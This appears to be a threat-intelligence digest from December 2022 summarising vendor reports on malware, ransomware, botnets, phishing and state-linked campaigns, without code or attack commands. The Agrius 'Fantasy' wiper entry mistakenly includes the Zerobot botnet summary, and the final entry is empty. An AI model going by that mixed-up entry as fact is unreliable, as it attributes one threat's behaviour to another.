- Intel Source:
- CrowdStrike
- Intel Name:
- GuLoader_Dissection_Malware_Analysis
- Date of Scan:
- 2022-12-20
- Impact:
- LOW
- Summary:
- CrowdStrike researchers expose complete GuLoader behavior by mapping all embedded DJB2 hash values for every API used by the malware
—
- Intel Source:
- FlashPoint
- Intel Name:
- RisePro_Stealer_Malware_Presence_on_Russian_Market
- Date of Scan:
- 2022-12-20
- Impact:
- LOW
- Summary:
- Researchers from Flashpoint have observed RisePro stealer malware logs on Russian market and the appearance of the stealer as a payload for a pay-per-install service, may indicate its growing popularity and viability within the threat actor community.
Source:
https://flashpoint.io/blog/risepro-stealer-and-pay-per-install-malware-privateloader/
—
- Intel Source:
- Nozomi Networks
- Intel Name:
- Malicious_Glupteba_Activity
- Date of Scan:
- 2022-12-19
- Impact:
- MEDIUM
- Summary:
- Nozomi Networks Lab shared their latest dicoveries on the Glupteba trojan which is an example of a threat actor leveraging blockchain-based technologies to carry out their malicious activity.
Source:
https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_Leveraging_DELTA_System_Users_Using_FateGrab_or_StealDeal_Malware
- Date of Scan:
- 2022-12-19
- Impact:
- LOW
- Summary:
- CERT-UA researchers have identified the distribution of e-mail, using a compromised e-mail address of one of the employees of the Ministry of Defense. The attachments in the form of PDF documents imitate legitimate digests of the ISTAR unit of the Zaporizhzhia Police Department but contain a link to a malicious ZIP archive.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Infostealer_Malware_with_Double_Extension
- Date of Scan:
- 2022-12-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the file attachment which is pretending to be from HSBC global payment and cash management and named payment_copy.pdf.z is a RAR archive. It comes out as a double extension with pdf.exe. The file is a trojan infostealer and is detected by multiple scanning engines.
Source:
https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Malicious_Python_Package_Shaderz_Distributing_via_Supply_Chain_Attack
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have analyzed Shaderz zero-day and closely monitored its downloaded executables.
—
- Intel Source:
- Cyble
- Intel Name:
- CSC_Bank_Mitra_fraudulent_operation
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Cyble Research & Intelligence Labs studied a fraud scheme operation done by impostors posing as Village Level Entrepreneurs (VLEs) to dupe and scam Indian rural subscribers registering for Customer Service Point (Bank Mitra), an initiative under the Common Services Center (CSC) Scheme of the Ministry of Electronics and Information Technology (MEITY), India.
—
- Intel Source:
- Mandiant
- Intel Name:
- Ukrainian_Government_Networks_Breached_via_Trojanized_Windows_10_Installers
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have observed that Ukrainian government entities are hacked in targeted attacks after their networks are first compromised via trojanized ISO files posing as legitimate Windows 10 installers.
Source:
https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
—
- Intel Source:
- Cyfirma
- Intel Name:
- Russian_Threat_Groups_Launching_Multiple_Campaigns
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Cyfirma researchers have observed three campaigns named Evian, UNC064, and Siberian bear that are potentially operated by Russian-speaking threat groups on behalf of their Russian Masters.
—
- Intel Source:
- Microsoft
- Intel Name:
- MCCrash_Botnet_Targeting_Private_Minecraft_Servers
- Date of Scan:
- 2022-12-16
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have identified a cross-platform botnet named MCCrash that’s primarily designed to launch distributed denial-of-service (DDoS) attacks against private Minecraft servers. It is characterized by a unique spreading mechanism that allows it to propagate to Linux-based devices despite originating from malicious software downloads on Windows hosts.
—
- Intel Source:
- Cyble
- Intel Name:
- DarkTortilla_Malware_Spreading_Via_Phishing_Sites
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a malicious campaign where they observed hackers dropping DarkTortilla malware. It is a complex .NET-based malware that has been active since 2015 and the malware is known to drop multiple stealers and Remote Access Trojans (RATs) such as AgentTesla, AsyncRAT, NanoCore, etc.
Source:
https://blog.cyble.com/2022/12/16/sophisticated-darktortilla-malware-spreading-via-phishing-sites/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Agenda_Ransomware_Using_Rust_language
- Date of Scan:
- 2022-12-16
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have analyzed a sample of the Agenda ransomware written in Rust language and detected it as Ransom.Win32.AGENDA.THIAFBB. It is recently targeting critical sectors such as the healthcare and education industries.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Hackers_Leveraging_Google_Ads_to_Distribute_IcedID
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified that campaigns pushing IcedID malware (also known as Bokbot) via google ads.
Source:
https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344/
—
- Intel Source:
- Proofpoint
- Intel Name:
- Iran_linked_cyberspies_expand_targeting_to_medical_researchers_and_travel_agencies
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have analyzed the threat group TA453 and observed outlier campaigns are likely to continue and reflect IRGC intelligence collection requirements, including possible support for hostile, and even kinetic, operations.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta453-refuses-be-bound-expectations
—
- Intel Source:
- Checkmarx Security
- Intel Name:
- Hackers_Blast_Open_Source_Repositories_with_Over_144000_Malicious_Packages
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Checkmarx researchers have identified that unknown threat actors have uploaded a massive 144,294 phishing-related packages on open-source package repositories, inluding NPM, PyPi, and NuGet.
Source:
https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/
—
- Intel Source:
- ESET Research
- Intel Name:
- Spearphishing_Campaign_Targeting_Japanese_Political_Entities
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- Researchers from ESET have discovered a spearphishing campaign targeting Japanese political entities a few weeks before the House of Councillors elections, and in the process uncovered a previously undescribed MirrorFace credential stealer.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_distribution_again
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered that Magniber Ransomware is being distributed again with COVID-19 related filenames, while the threat actor has changed the infection vector and is using social engineering techniques.
—
- Intel Source:
- ASEC
- Intel Name:
- STOP_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-12-15
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the STOP ransomware is distributed in Korea and the files that are currently distributed are in the form of MalPe just like SmokeLoader and Vidar, and the filenames include a random 4-byte string.
—
- Intel Source:
- Cyble
- Intel Name:
- Thre_increased_Activity_of_Mallox_Ransomware
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) recently observed a spike in Mallox ransomware samples. The researchers named it TargetCompany ransomware because it adds the targeted company name as a file extension to the encrypted files. In September 2022, researchers identified a TargetCompany ransomware variant targeting Microsoft SQL servers and adding the “Fargo” extension to the encrypted files. TargetCompany ransomware is also known to add a “Mallox” extension after encrypting the files.
Source:
https://blog.cyble.com/2022/12/08/mallox-ransomware-showing-signs-of-increased-activity/
—
- Intel Source:
- Cyble
- Intel Name:
- Expendtion_of_Venom_RAT_operations
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- CRIL has uncovered a new version of the Venom RAT (Remote Access Trojan), which can steal sensitive data from a victim’s computer. Venom RAT is an effective malware that works stealthily, giving attackers unauthorized access to the victim’s machine. Threat Actors can then use the victim’s computer to perform various malicious activities such as installing and removing additional malware, manipulating files, reading data from the keyboard, harvesting login credentials, monitoring the clipboard.
Source:
https://blog.cyble.com/2022/12/13/venom-rat-expands-its-operations-by-adding-a-stealer-module/
—
- Intel Source:
- Weixin
- Intel Name:
- The_new_Go_language_botnet_RedGoBot
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Last month QiAnXin Threat Intelligence Center had an incident where a malicious sample from an unknown family exploited the Vacron NVR RCE vulnerability to spread. They did the detailed analysis, this series of samples does not belong to known malicious families. The malicious sample will print the string “GoBot” when it runs, and refer to the author’s output “@redbot on top” on his property website, we named it RedGoBot.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Cloud_Atlas_Targeting_Entities_in_Russia_and_Belarus
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Checkpoint researchers have identified Cloud Atlas continuously and persistently targeting entities of interest. With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy, and technology sectors, and on the annexed regions of Ukraine.
—
- Intel Source:
- Cyber
- Intel Name:
- Analysis_of_Royal_Ransomware
- Date of Scan:
- 2022-12-14
- Impact:
- MEDIUM
- Summary:
- The Royal ransomware group emerged in early 2022 and has gained momentum since the middle of the year. Its ransomware, which the group deploys through different TTPs, has impacted multiple organizations across the globe. The group itself is suspected of consisting of former members of other ransomware groups, based on similarities researchers have observed between Royal ransomware and other ransomware operators.
Source:
https://www.cybereason.com/blog/royal-ransomware-analysis
—
- Intel Source:
- Fortinet
- Intel Name:
- GoTrim_Botnet_Brute_Forces_WordPress_Site_Admin_Accounts
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have observed a new Go-based botnet malware named ‘GoTrim’ is scanning the web for self-hosted WordPress websites and attempting to brute force the administrator’s password and take control of the site.
—
- Intel Source:
- Secureworks
- Intel Name:
- COALT_MIRAGE_Hackers_Leveraging_Drokbk_Malware
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Researchers from Secureworks have investigated the Drokbk malware, which is operated by a subgroup of the Iranian government-sponsored COBALT MIRAGE threat group. This subgroup is known as Cluster B. Drokbk is written in .NET and is made up of a dropper and a payload.
Source:
https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver
—
- Intel Source:
- Wordfence
- Intel Name:
- Vulnerabilities_Found_in_Adning_and_Kaswara_Plugin
- Date of Scan:
- 2022-12-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Wordfence have observed that spikes in attacks serve as a reminder to update plugins.
Source:
https://www.wordfence.com/blog/2022/12/spikes-in-attacks-serve-as-a-reminder-to-update-plugins/
—
- Intel Source:
- Mandient, Sentilone
- Intel Name:
- Targeted_Attacks_Leverage_Signed_Malicious_Microsoft_Drivers
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- SentinelOne discovered active threat actors abusing legitimately signed Microsoft drivers in active intrusions into telecommunication, BPO, MSSP, and financial services businesses. Investigations into these intrusions led to the discovery of POORTRY and STONESTOP malware, part of a small toolkit designed to terminate AV and EDR processes.
Source:
https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/
—
- Intel Source:
- Phylum
- Intel Name:
- Malware_Strains_Targeting_Python_and_JavaScript_Developers
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Phylum researchers have identified an active malware campaign targeting the Python Package Index (PyPI) and npm repositories for Python and JavaScript with typosquatting and fake modules that deploy a ransomware strain, marking the latest security issue to affect software supply chains.
Source:
https://blog.phylum.io/phylum-detects-active-typosquatting-campaign-in-pypi
—
- Intel Source:
- SentinelOne, Mandiant and Sophos
- Intel Name:
- MS_Signed_Malicious_Drivers_Used_in_Ransomware_Attacks
- Date of Scan:
- 2022-12-14
- Impact:
- MEDIUM
- Summary:
- Microsoft revoked several hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents. Multiple researchers explain that threat actors are utilizing malicious kernel-mode hardware drivers whose trust is verified with Authenticode signatures from Microsoft’s Windows Hardware Developer Program.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Leveraging_LiveHelp100_For_Supply_Chain_Attacks
- Date of Scan:
- 2022-12-14
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have analyzed the infection chain and the pieces of malware used by malicious actors in supply-chain attacks that leveraged trojanized installers of chat-based customer engagement platforms.
—
- Intel Source:
- Fortiguard
- Intel Name:
- FortiOS_SSL_VPN_bug
- Date of Scan:
- 2022-12-13
- Impact:
- MEDIUM
- Summary:
- Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN vulnerability, tracked as CVE-2022-42475, that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on devices.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Analysis_of_the_infamous_Azov_Ransomware
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Chepoint have shared report goes with more details regarding the internal workings of Azov ransomware and its technical features.
—
- Intel Source:
- Trustwave
- Intel Name:
- Formbook_malware_deployed_using_OneNote_Documents
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Trustwave uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service.
—
- Intel Source:
- Cymru
- Intel Name:
- Continuation_of_Iranian_Exploitation_Activities
- Date of Scan:
- 2022-12-13
- Impact:
- MEDIUM
- Summary:
- Cymru shared an update on ongoing tracking of PHOSPHORUS threat actor group associated with Iran. PHOSPHORUS is an Iranian threat group known to target organizations in energy, government, and technology sectors based in Europe, the Middle East, the United States, and other countries/regions.
Source:
https://www.team-cymru.com/post/iranian-exploitation-activities-continue-as-of-november-2022
—
- Intel Source:
- ASEC
- Intel Name:
- Microsoft_Account_Stealing_Phishing_Page
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified a large portion of phishing emails with the purpose of stealing login credentials to target Microsoft accounts.
—
- Intel Source:
- Ptsecurity
- Intel Name:
- The_Cloud_Atlas_group_activity
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Ptsecurity discussed the main techniques of the Cloud Atlas group, and took an in-depth look at the tools they use and posted the detailed analysis and description of the functionality of these tools.
—
- Intel Source:
- Juniper Network
- Intel Name:
- New_Python_Backdoor_Targeting_VMware_ESXi_Servers
- Date of Scan:
- 2022-12-13
- Impact:
- LOW
- Summary:
- Juniper Network researchers have identified a previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system.
Source:
https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
—
- Intel Source:
- Jscrambler
- Intel Name:
- A_new_batch_of_Web_Skimming_attacks
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Jscrambler analysts observed a new modus operandi evident in three threat groups. The analysts shared their analyses about their findings in detail about it.
Source:
https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Linux_Cryptocurrency_Mining_Attacks_Increasing_via_CHAOS_RAT
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have observed a cryptocurrency mining attack that incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool.
Source:
https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html
—
- Intel Source:
- Sucuri
- Intel Name:
- World_Cup_Keywords_targeted_by_Chinese_Gambling_Spam
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Many of the compromised websites have been recently updated to include modified titles for keywords related to the Qatar 2022 FIFA World Cup. Recently the researchers team has observed a pivot for the campaign to leverage search traffic for the popular World Cup soccer championship.
Source:
https://blog.sucuri.net/2022/12/chinese-gambling-spam-targets-world-cup-keywords.html
—
- Intel Source:
- Deep Instinct
- Intel Name:
- MuddyWater_APT_group_is_back_with_updated_TTPs
- Date of Scan:
- 2022-12-12
- Impact:
- LOW
- Summary:
- Researchers from Deep Instinct have identified a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros, and Static Kitten) that was targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and United Arab Emirates.
Source:
https://www.deepinstinct.com/blog/new-muddywater-threat-old-kitten-new-tricks
—
- Intel Source:
- Cyble
- Intel Name:
- The_various_scams_exploiting_the_popularity_of_the_FIFA_World_Cup
- Date of Scan:
- 2022-12-10
- Impact:
- LOW
- Summary:
- While monitoring phishing activity, Cyble Research & Intelligence Labs identified a few crypto phishing schemes involving the use of the FIFA World Cup theme to lure the victims. The phishing site “football-blnance[.]com” was pretending to be the Binance cryptocurrency website attempting to trick users into giving sensitive information by offering free Non-Fungible Tokens (NFTs).
Source:
https://blog.cyble.com/2022/12/09/threat-actors-targeting-fans-amid-fifa-world-cup-fever/
—
- Intel Source:
- Esentire
- Intel Name:
- The_Redline_Stealer_distribution_via_fake_software_AnyDesk
- Date of Scan:
- 2022-12-10
- Impact:
- MEDIUM
- Summary:
- ESentire SOC Cyber Analysts did deeper malware analysis into the technical details of how the Redline Stealer malware operates and concluded that Redline Stealer is mostly being distributed via fake software. Attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer. Attacker(s) use an AutoIt wrapper and various crypting services to obfuscate the stealer binary. Redline comes with loader tasks that allow an attacker to perform various actions on the infected host including file download, process injection and command execution.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer
—
- Intel Source:
- CERT-UA
- Intel Name:
- kamikaze_drones_and_DolphinCape_malware
- Date of Scan:
- 2022-12-09
- Impact:
- MEDIUM
- Summary:
- Government Computer Emergency Response Team of Ukraine CERT-UA received information from specialists of the cyber security division of JSC “Ukrzaliznytsia” regarding the sending of e-mails with the topic “How to recognize a kamikaze drone.” from the address “[email protected][.]ua”, apparently, on behalf of the State Emergency Service of Ukraine.
—
- Intel Source:
- Intel Name:
- Internet_Explorer_0day_exploited_by_North_Korean_actor_APT37
- Date of Scan:
- 2022-12-09
- Impact:
- LOW
- Summary:
- Google’s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild. This blog will describe a 0-day vulnerability, discovered by TAG in late October 2022, embedded in malicious documents and used to target users in South Korea.
—
- Intel Source:
- Esentire
- Intel Name:
- New_Infection_Technique_of_GootLoader_malware
- Date of Scan:
- 2022-12-09
- Impact:
- MEDIUM
- Summary:
- On December 2, 2022, one of ESentire SOC Cyber Analysts raised their incident involving the GootLoader malware at a pharmaceutical company. eSentire’s Threat Response Unit proceeded with an in-depth threat investigation of GootLoader.
Source:
https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_identified_TAG53_infrastructure_features_common_traits
- Date of Scan:
- 2022-12-09
- Impact:
- LOW
- Summary:
- Recorded Future’s Insikt Group has identified new infrastructure used by TAG-53, a group likely linked to suspected Russian threat activity groups Callisto Group, COLDRIVER, and SEABORGIUM.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Breaking_the_silence_Truebot_activity
- Date of Scan:
- 2022-12-09
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers that one of the new follow-on payloads that Truebot drops is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.
Source:
https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Cloud_compute_credentials_attack_examples
- Date of Scan:
- 2022-12-09
- Impact:
- LOW
- Summary:
- Unit 42 PaloAlto shared in their blog two examples of cloud compute credentials attacks in the wild. They de3scribed in it the post-breach actions executed during the attack, and share the flow of these two attacks against the cloud infrastructure. The attack flows show how threat actors abuse stolen compute credentials to pursue a variety of attack vectors and abuse cloud services in unexpected ways. This emphasizes how important it is to follow Amazon Web Services and Google Cloud logging and monitoring best practices.
Source:
https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Email_Impersonating_Quasi_governmental_Organization_Being_Distributed
- Date of Scan:
- 2022-12-08
- Impact:
- LOW
- Summary:
- ASEC analysis team has recently detected the distribution of a phishing email impersonating a non-profit quasi-governmental organization. Since the email is using a webpage disguised as a login page of GobizKOREA serviced by Korea SMEs and Startups Agency (KOSME), users who are working in the trading industry should take extra caution.
—
- Intel Source:
- Threat Fabric
- Intel Name:
- New_obfuscation_service_used_by_Ermac_when_distributed_together_with_desktop_stealers
- Date of Scan:
- 2022-12-08
- Impact:
- LOW
- Summary:
- ThreatFabric’s analysts discovered a campaign employing several Trojans, and targeting both Android and Windows users at the same time, in order to reach as much victims as possible. Besides Ermac Android banking Trojan, the campaign involved desktop malware in the form of Erbium, Aurora stealer, and Laplas “clipper”.
Source:
https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html
—
- Intel Source:
- Picus Security
- Intel Name:
- Cuba_Ransomware_TTPs
- Date of Scan:
- 2022-12-08
- Impact:
- MEDIUM
- Summary:
- Security researchers from Picus Security have track downed a new variant of the Cuba ransomware as Tropical Scorpius. This Cuba ransomware group mainly targets manufacturing, professional and legal services, financial services, construction, high technology, and healthcare sectors
—
- Intel Source:
- Securelist
- Intel Name:
- DeathStalker_targets_legal_entities_with_new_Janicab_variant
- Date of Scan:
- 2022-12-08
- Impact:
- LOW
- Summary:
- Securelist’s reserachers Deathstalker intrusions that use the Janicab malware family, we identified a new Janicab variant used in targeting legal entities in the Middle East throughout 2020, possibly active during 2021 and potentially extending an extensive campaign that has been traced back to early 2015 and targeted legal, financial, and travel agencies in the Middle East and Europe.
Source:
https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/
—
- Intel Source:
- ASEC
- Intel Name:
- Resumexll_File_Being_Distributed_in_Korea
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- ASEC analysis team shared that malware with the XLL file format (file extension: .xll) was being distributed via email. The XLL file has a DLL form of a PE (Portable Executable) file but is executed with Microsoft Excel.
—
- Intel Source:
- Bitdefender
- Intel Name:
- A_New_BackdoorDiplomacy_Threat_Actor_Campaign_Investigation
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- Bitdefender researchers did some discoveres for a malicious campaign involving the abuse of binaries vulnerable to sideloading, targeting the Middle East. The reserachers analyzed the evidence for the traces linked to a cyber-espionage operation performed most likely by Chinese threat actor BackdoorDiplomacy against victims that they have linked to activity in the telecom industry in the Middle East.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Distributed_with_Disguised_Filenames
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- ASEC analysis team made a post on the malware being distributed with filenames that utilize RTLO (Right-To-Left Override). RTLO is a unicode that makes an override from right to left. This type of malware induces users to execute its files by mixing filenames with extensions
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Email_Disguised_as_a_WellKnown_Korean_Airline
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The phishing email contains a notice on airline ticket payment, inducing the reader to connect to the disguised phishing page with specific ticket prices and details that implies that the sender has background information of the reader.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- CrowdStrike_Investigations_Reveal_Intrusion_Campaign_Targeting_Telco_and_BPO_Companies
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- CrowdStrike Services reviews a recent, extremely persistent intrusion campaign targeting telecommunications and business process outsourcing (BPO) companies and outlines how organizations can defend and secure their environments.
Source:
https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/
—
- Intel Source:
- Microsoft
- Intel Name:
- Targeted_attacks_by_DEV_0139_against_the_cryptocurrency_industry
- Date of Scan:
- 2022-12-07
- Impact:
- LOW
- Summary:
- Microsoft shared that cryptocurrency companies have been targeted by a threat group DEV-0139 via Telegram groups used to communicate with the firms’ VIP customers.
—
- Intel Source:
- Fortinet
- Intel Name:
- Zerobot_New_Go_Based_Botnet
- Date of Scan:
- 2022-12-07
- Impact:
- MEDIUM
- Summary:
- Recently FortiGuard Labsteam observed a new botnet written in the Go language being distributed through IoT vulnerabilities and categorized it as critical. This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol. The reserachers detailed in the article how this malware leverages vulnerabilities and examines its behavior once inside an infected device.
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- A_new_Agrius_threat_group_wiper_Fantasy
- Date of Scan:
- 2022-12-07
- Impact:
- MEDIUM
- Summary:
- Agrius is a new Iranian group targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper. Recently group deployed a new wiper named Fantasy. Most of its code base comes from Apostle, Agrius’s previous wiper. Recently FortiGuard Labsteam observed a new botnet written in the Go language being distributed through IoT vulnerabilities and categorized it as critical. This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol. The reserachers detailed in the article how this malware leverages vulnerabilities and examines its behavior once inside an infected device.
Source:
https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/
—
- Intel Source:
- Fortinet
- Intel Name:
- Ransomware_Turning_into_an_Accidental_Wiper
- Date of Scan:
- 2022-12-06
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGate have observed Cryptonite sample in the wild that never offers the decryption window, instead acting as a wiper. We recently saw an increase in ransomware intentionally turned into wiper malware, primarily as part of a political campaign.
—
- Intel Source:
- Cybereason
- Intel Name:
- Masquerading_as_a_Software_Installer
- Date of Scan:
- 2022-12-05
- Impact:
- LOW
- Summary:
- Cybereason GSOC team analyzes a technique that utilizes Microsoft’s Windows Installation file (.msi) to compromise victims’ machines. MSI, formerly known as Microsoft Installer, is a Windows installer package format.
Source:
https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer
—
- Intel Source:
- Security Affairs
- Intel Name:
- Lazarus_APT_uses_fake_cryptocurrency_apps_to_spread_AppleJeus_Malware
- Date of Scan:
- 2022-12-05
- Impact:
- LOW
- Summary:
- The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware.
Source:
https://securityaffairs.co/wordpress/139290/apt/lazarus-apt-bloxholder-campaign.html
—
- Intel Source:
- Reversing Labs
- Intel Name:
- A_deep_dive_into_ZetaNile
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- ZetaNile is a set of open-source software trojans being used by Lazarus/ZINC. This set of trojanized, open-source software implants has been dubbed ZetaNile by Microsoft and BLINDINCAN by CISA. After some investigation, this campaign presented an opportunity for deep study by the ReversingLabs Research Team.
Source:
https://blog.reversinglabs.com/blog/zetanile-open-source-software-trojans-from-north-korea
—
- Intel Source:
- Mandiant
- Intel Name:
- The_cyber_espionage_activity_with_USB_devices
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- Mandiant Managed Defense team recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines and tracked this activity as UNC4191 and pissible linked to a China nexus.
Source:
https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia
—
- Intel Source:
- Securelist
- Intel Name:
- New_CryWiper_Trojan
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- Russian reserachers from Securelist caught some attempts by a previously unknown Trojan, which was named CryWiper, to attack the organization’s network in the Russian Federation. After studying a sample of malware, they found out that this Trojan, although it disguises itself as a ransomware and extorts money from the victim for “decrypting” data, in fact does not encrypt, but purposefully destroys data in the affected system. Moreover, the analysis of the Trojan’s program code showed that this was not the developer’s mistake, but his original intention.
Source:
https://securelist.ru/novyj-troyanec-crywiper/106114/
—
- Intel Source:
- Weixin
- Intel Name:
- Mizuho_Bank_of_Japan_as_bait_for_Lazarus_attack
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- Recently, the Red Raindrop team of QiAnXin Threat Intelligence Center found the latest 0 – kill soft-check attack sample of Lazarus organization in daily threat hunting. Information is used as bait to attack.
—
- Intel Source:
- Trustwave
- Intel Name:
- Phishing_and_Scams_to_Be_Aware_of_this_Season
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
- Trustwave team has warned to be one the lookout this holiday shopping season for phishing and scams specifically designed to blend in with holiday online shopping activities. Trustwave SpiderLabs has compiled a list of the most prevalent shopping-related scams expected this year. These samples were recently observed from Trustwave’s spam traps and other Trustwave monitoring systems.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_analyses_of_Erbium_Stealer_Malware
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- CYFIRMA research team observed and analyzed the malware sample. The team has also observed the stealer malware being advertised on Russian-speaking hacker forums. The malware sample is a 32-bit executable binary. It contains obfuscated contents to evade detection by security products and firewalls.
Source:
https://www.cyfirma.com/outofband/erbium-stealer-malware-report/
—
- Intel Source:
- CISA
- Intel Name:
- A_released_joint_Cybersecurity_Advisory_for_Cuba_Ransomware
- Date of Scan:
- 2022-12-02
- Impact:
- MEDIUM
- Summary:
- The FBI and CISA released a joint Cybersecurity Advisory (CSA) to provide network defenders tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware
Source:
https://www.cisa.gov/uscert/ncas/current-activity/2022/12/01/stopransomware-cuba-ransomware
—
- Intel Source:
- Elastic
- Intel Name:
- The_delivery_of_YIPPHB_dropper
- Date of Scan:
- 2022-12-02
- Impact:
- LOW
- Summary:
